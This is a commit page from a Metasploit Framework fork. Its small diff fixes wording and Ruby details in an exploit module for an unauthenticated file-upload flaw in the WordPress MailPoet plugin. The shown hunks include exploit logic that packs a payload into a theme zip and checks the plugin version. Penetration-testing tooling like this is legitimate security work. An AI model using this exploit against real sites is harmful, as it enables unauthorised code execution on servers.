dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Small fixes for the recent WP MailPoet module 

Correct casing in the title
Anchor the use of ::File
Force body.to_s since it can be nil in corner cases
This commit is contained in:
HD Moore 2014-07-05 13:17:23 -05:00
parent 98a82bd145
commit 6d9bf83ded
1 changed files with 8 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
View File

@ -13,13 +13,13 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated file Upload', 'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload',
'Description' => %q{ 'Description' => %q{
The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7 The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
is vulnerable to an unauthenticated file upload. The exploits uses the upload Theme is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme
functionality to upload a zip file containing the payload. The plugin used the functionality to upload a zip file containing the payload. The plugin used the
admin_init hook without knowning the hook is also executed for unauthenticated admin_init hook, which is also executed for unauthenticated users when accessing
users when calling the right URL. a specific URL.
}, },
'Author' => 'Author' =>
[ [
@ -46,8 +46,8 @@ class Metasploit3 < Msf::Exploit::Remote
# -) Additional files in the folder # -) Additional files in the folder
content = { content = {
File.join(theme_name, 'style.css') => '', ::File.join(theme_name, 'style.css') => '',
File.join(theme_name, payload_name) => payload.encoded ::File.join(theme_name, payload_name) => payload.encoded
} }
zip_file = Rex::Zip::Archive.new zip_file = Rex::Zip::Archive.new
@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
# try to extract version from readme # try to extract version from readme
# Example line: # Example line:
# Stable tag: 2.6.6 # Stable tag: 2.6.6
version = res.body[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1] version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
# readme present, but no version number # readme present, but no version number
if version.nil? if version.nil?
@ -132,4 +132,4 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'GET' 'method' => 'GET'
}) })
end end
end end